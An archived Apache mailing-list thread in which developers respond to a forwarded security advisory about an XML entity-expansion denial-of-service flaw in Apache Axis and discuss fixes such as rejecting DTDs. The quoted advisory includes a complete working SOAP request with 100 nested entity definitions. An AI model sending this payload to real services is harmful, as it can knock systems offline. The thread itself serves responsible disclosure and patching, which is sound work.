You are viewing a plain text version of this content. The canonical link for it is here.
Posted to soap-dev@ws.apache.org by Scott Nichol <sn...@scottnichol.com> on 2002/11/27 00:13:46 UTC
Re: Fw: Security Alert - Apache/Axis
I notice that the Axis solution is brute force: refuse to process any
request with a DTD. Since Apache SOAP reads the envelope into a string
before parsing it to a DOM, a similarly brute-force approach would be to
refuse to process any envelope containing <!DOCTYPE. (If this were
intended to a valid part of parameter data, the < would be <.)
Scott Nichol
----- Original Message -----
From: "Sanjiva Weerawarana" <sa...@watson.ibm.com>
To: <ax...@xml.apache.org>; <xe...@xml.apache.org>;
<di...@yahoo.com>; <to...@apache.org>
Cc: <ax...@xml.apache.org>
Sent: Tuesday, November 26, 2002 4:46 PM
Subject: Re: Fw: Security Alert - Apache/Axis
> Note that this vulnarability exists in Apache SOAP because we use
> the DOM parser and there's no way to shut turn off entity expansion
> AFAIK. The only solution would be to do some Xerces specific thing
> and lose the JAXP capability .. which would suck.
>
> Sanjiva.
>
> ----- Original Message -----
> From: "Dirk-Willem van Gulik" <di...@webweaving.org>
> To: <xe...@xml.apache.org>; <di...@yahoo.com>; <to...@apache.org>
> Cc: <ax...@xml.apache.org>
> Sent: Tuesday, November 26, 2002 4:27 PM
> Subject: Re: Fw: Security Alert - Apache/Axis
>
>
> >
> > Tom/Dims,
> >
> > Could you folks verify this and report back to security@apache.org
that
> > each of those are 100% taken care of ?
> >
> > Then security@ can report back to the various constituencies, work
with
> > CERT if that is needed, etc. If you have any thoughds/statement
which need
> > to be added - make sure you add that.
> >
> > Dw
> >
> > On Tue, 26 Nov 2002, Davanum Srinivas wrote:
> >
> > > I think tom fixed it
> (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
> > >
> > > Thanks,
> > > dims
> > >
> > > --- Ted Leung <tw...@sauria.com> wrote:
> > > > This security alert came through today.
> > > >
> > > > Ted
> > > > ----- Original Message -----
> > > > From: "Ian Holsman" <ia...@cnet.com>
> > > > To: <se...@apache.org>
> > > > Cc: "Ory Segal" <OR...@sanctuminc.com>
> > > > Sent: Tuesday, November 26, 2002 8:02 AM
> > > > Subject: Security Alert - Apache/Axis
> > > >
> > > >
> > > > > Dear security@apache.org,
> > > > >
> > > > > During a recent security audit at one of our customers,
Sanctum
> found a
> > > > > security vulnerability in your product Apache/Axis.
> > > > > The details of this vulnerability are described in the
attached text
> file.
> > > > >
> > > > > We intend to issue a public advisory on BugTraq, SecuriTeam
and
> other site
> > > > > forums about this vulnerability the last week of November.
Please
> note,
> > > > the
> > > > > advisory will not contain specifics that might enable someone
to
> exploit
> > > > the
> > > > > vulnerability.
> > > > >
> > > > > We would appreciate it if you could issue a patch in that
timeline
> (i.e.
> > > > > around November 25th), so it can be linked to our advisory.
> > > > >
> > > > > Please feel free to contact me for more information/help.
> > > > >
> > > > > Thanks,
> > > > > -Amit
> > > > >
> > > > > <<XML_DTD_Axis.txt>>
> > > > >
> > > > >
> > > >
> > > >
> > >
>
> ----------------------------------------------------------------------
----
> --
> > > > ----
> > > >
> > > >
> > > >
>
> ---------------------------------------------------------------------
> > > > > To unsubscribe, e-mail: security-unsubscribe@apache.org
> > > > > For additional commands, e-mail: security-help@apache.org
> > > > >
>
///////////////////////////////////////////////////////////////////////
> > > > ========================>> Security Advisory
> <<========================
> > > >
>
///////////////////////////////////////////////////////////////////////
> > > >
> > > >
> > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> > > >
> > > > => Release date: 14/Nov/2002
> > > >
> > > > => Vendor: Apache Group
> > > >
> > > > The following product was found to be vulnerable:
> > > >
> > > > - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> > > >
> > > > The versions affected are the latest ones (as of October 2002).
> > > >
> > > > => Severity: High
> > > >
> > > > => CVE candidate: Not assigned yet.
> > > >
> > > > => Summary: Using the DTD part of the XML document, it is
possible to
> cause the
> > > > XML parser to consume 100% CPU and/or a lot of memory, therefore
> resulting in
> > > > a denial of service condition.
> > > >
> > > > => Description: The DTD part of the XML document enables the
document
> to define
> > > > named entities (other than the predefined <, >, etc.). The
> entities can be
> > > > defined using other entities (recursion is prohibited in XML
1.0).
> > > > Entities are expanded when they are referenced, inside the XML
> document.
> > > > The attack is comprised of defining and referencing an entity
which is
> defined
> > > > using two instances of another entity, which is (in turn)
defined as
> two instances
> > > > of yet another entity, and so on. This definition process can be
> repeated as long
> > > > as "necessary" - we found that nesting level of 100 is usually
> sufficient.
> > > > The 100th entity should be defined simply as a string. This has
the
> effect of having
> > > > the first entity contain, in theory, 2^99 (two to the power of
ninety
> nine)
> > > > concatenated values of the 100th entity.
> > > > Here's an example (the DTD is to be placed after the XML
declaration,
> and before the
> > > > root element of the XML document):
> > > >
> > > > <!DOCTYPE root [
> > > > <!ENTITY x100 "foobar">
> > > > <!ENTITY x99 "&x100;&x100;">
> > > > <!ENTITY x98 "&x99;&x99;">
> > > > <!ENTITY x97 "&x98;&x98;">
> > > > ...
> > > > <!ENTITY x3 "&x4;&x4;">
> > > > <!ENTITY x2 "&x3;&x3;">
> > > > <!ENTITY x1 "&x2;&x2;">
> > > > ]>
> > > >
> > > > Referring to the first entity inside a document that would
otherwise
> be accepted by
> > > > the application (using the syntax &x1;), results in a DoS
condition,
> due to the
> > > > excessive CPU load and/or memory load required by the XML parser
to
> expand this entity.
> > > >
> > > > => Solution: Not available yet.
> > > >
> > > > => Workaround: Not available yet.
> > > >
> > > > => Example:
> > > >
> > > > Ory Segal from Sanctum devised a SOAP request that manages to
mount
> this attack requiring
> > > > only a path to an existing web service to be known to the
attacker.
> > > >
> > > > The request is:
> > > >
> > > > POST path_to_web_service HTTP/1.0
> > > > Host: ...
> > > > Content-Type: text/xml
> > > > SOAPAction: ""
> > > > Content-Length: 3224
> > > >
> > > > <?xml version="1.0" ?>
> > > > <!DOCTYPE foobar [
> > > > <!ENTITY x0 "hello">
> > > > <!ENTITY x1 "&x0;&x0;">
> > > > <!ENTITY x2 "&x1;&x1;">
> > > > <!ENTITY x3 "&x2;&x2;">
> > > > <!ENTITY x4 "&x3;&x3;">
> > > > <!ENTITY x5 "&x4;&x4;">
> > > > <!ENTITY x6 "&x5;&x5;">
> > > > <!ENTITY x7 "&x6;&x6;">
> > > > <!ENTITY x8 "&x7;&x7;">
> > > > <!ENTITY x9 "&x8;&x8;">
> > > > <!ENTITY x10 "&x9;&x9;">
> > > > <!ENTITY x11 "&x10;&x10;">
> > > > <!ENTITY x12 "&x11;&x11;">
> > > > <!ENTITY x13 "&x12;&x12;">
> > > > <!ENTITY x14 "&x13;&x13;">
> > > > <!ENTITY x15 "&x14;&x14;">
> > > > <!ENTITY x16 "&x15;&x15;">
> > > > <!ENTITY x17 "&x16;&x16;">
> > > > <!ENTITY x18 "&x17;&x17;">
> > > > <!ENTITY x19 "&x18;&x18;">
> > > > <!ENTITY x20 "&x19;&x19;">
> > > > <!ENTITY x21 "&x20;&x20;">
> > > > <!ENTITY x22 "&x21;&x21;">
> > > > <!ENTITY x23 "&x22;&x22;">
> > > > <!ENTITY x24 "&x23;&x23;">
> > > > <!ENTITY x25 "&x24;&x24;">
> > > > <!ENTITY x26 "&x25;&x25;">
> > > > <!ENTITY x27 "&x26;&x26;">
> > > > <!ENTITY x28 "&x27;&x27;">
> > > > <!ENTITY x29 "&x28;&x28;">
> > > > <!ENTITY x30 "&x29;&x29;">
> > > > <!ENTITY x31 "&x30;&x30;">
> > > > <!ENTITY x32 "&x31;&x31;">
> > > > <!ENTITY x33 "&x32;&x32;">
> > > > <!ENTITY x34 "&x33;&x33;">
> > > > <!ENTITY x35 "&x34;&x34;">
> > > > <!ENTITY x36 "&x35;&x35;">
> > > > <!ENTITY x37 "&x36;&x36;">
> > > > <!ENTITY x38 "&x37;&x37;">
> > > > <!ENTITY x39 "&x38;&x38;">
> > > > <!ENTITY x40 "&x39;&x39;">
> > > > <!ENTITY x41 "&x40;&x40;">
> > > > <!ENTITY x42 "&x41;&x41;">
> > > > <!ENTITY x43 "&x42;&x42;">
> > > > <!ENTITY x44 "&x43;&x43;">
> > > > <!ENTITY x45 "&x44;&x44;">
> > > > <!ENTITY x46 "&x45;&x45;">
> > > > <!ENTITY x47 "&x46;&x46;">
> > > > <!ENTITY x48 "&x47;&x47;">
> > > > <!ENTITY x49 "&x48;&x48;">
> > > > <!ENTITY x50 "&x49;&x49;">
> > > > <!ENTITY x51 "&x50;&x50;">
> > > > <!ENTITY x52 "&x51;&x51;">
> > > > <!ENTITY x53 "&x52;&x52;">
> > > > <!ENTITY x54 "&x53;&x53;">
> > > > <!ENTITY x55 "&x54;&x54;">
> > > > <!ENTITY x56 "&x55;&x55;">
> > > > <!ENTITY x57 "&x56;&x56;">
> > > > <!ENTITY x58 "&x57;&x57;">
> > > > <!ENTITY x59 "&x58;&x58;">
> > > > <!ENTITY x60 "&x59;&x59;">
> > > > <!ENTITY x61 "&x60;&x60;">
> > > > <!ENTITY x62 "&x61;&x61;">
> > > > <!ENTITY x63 "&x62;&x62;">
> > > > <!ENTITY x64 "&x63;&x63;">
> > > > <!ENTITY x65 "&x64;&x64;">
> > > > <!ENTITY x66 "&x65;&x65;">
> > > > <!ENTITY x67 "&x66;&x66;">
> > > > <!ENTITY x68 "&x67;&x67;">
> > > > <!ENTITY x69 "&x68;&x68;">
> > > > <!ENTITY x70 "&x69;&x69;">
> > > > <!ENTITY x71 "&x70;&x70;">
> > > > <!ENTITY x72 "&x71;&x71;">
> > > > <!ENTITY x73 "&x72;&x72;">
> > > > <!ENTITY x74 "&x73;&x73;">
> > > > <!ENTITY x75 "&x74;&x74;">
> > > > <!ENTITY x76 "&x75;&x75;">
> > > > <!ENTITY x77 "&x76;&x76;">
> > > > <!ENTITY x78 "&x77;&x77;">
> > > > <!ENTITY x79 "&x78;&x78;">
> > > > <!ENTITY x80 "&x79;&x79;">
> > > > <!ENTITY x81 "&x80;&x80;">
> > > > <!ENTITY x82 "&x81;&x81;">
> > > > <!ENTITY x83 "&x82;&x82;">
> > > > <!ENTITY x84 "&x83;&x83;">
> > > > <!ENTITY x85 "&x84;&x84;">
> > > > <!ENTITY x86 "&x85;&x85;">
> > > > <!ENTITY x87 "&x86;&x86;">
> > > > <!ENTITY x88 "&x87;&x87;">
> > > > <!ENTITY x89 "&x88;&x88;">
> > > > <!ENTITY x90 "&x89;&x89;">
> > > > <!ENTITY x91 "&x90;&x90;">
> > > > <!ENTITY x92 "&x91;&x91;">
> > > > <!ENTITY x93 "&x92;&x92;">
> > > > <!ENTITY x94 "&x93;&x93;">
> > > > <!ENTITY x95 "&x94;&x94;">
> > > > <!ENTITY x96 "&x95;&x95;">
> > > > <!ENTITY x97 "&x96;&x96;">
> > > > <!ENTITY x98 "&x97;&x97;">
> > > > <!ENTITY x99 "&x98;&x98;">
> > > > <!ENTITY x100 "&x99;&x99;">
> > > > ]>
> > > > <SOAP-ENV:Envelope
> xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> > > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> > > > xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> > > > <SOAP-ENV:Body>
> > > > <ns1:aaa xmlns:ns1="urn:aaa"
> SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> > > > <foobar xsi:type="xsd:string">&x100;</foobar>
> > > > </ns1:aaa>
> > > > </SOAP-ENV:Body>
> > > > </SOAP-ENV:Envelope>
> > > >
> > > >
> > >
> > >
> > > =====
> > > Davanum Srinivas - http://xml.apache.org/~dims/
> > >
> > > __________________________________________________
> > > Do you Yahoo!?
> > > Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> > > http://mailplus.yahoo.com
> > >
> >
> ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: xerces-j-dev-unsubscribe@xml.apache.org
> > > For additional commands, e-mail: xerces-j-dev-help@xml.apache.org
> > >
> > >
>
>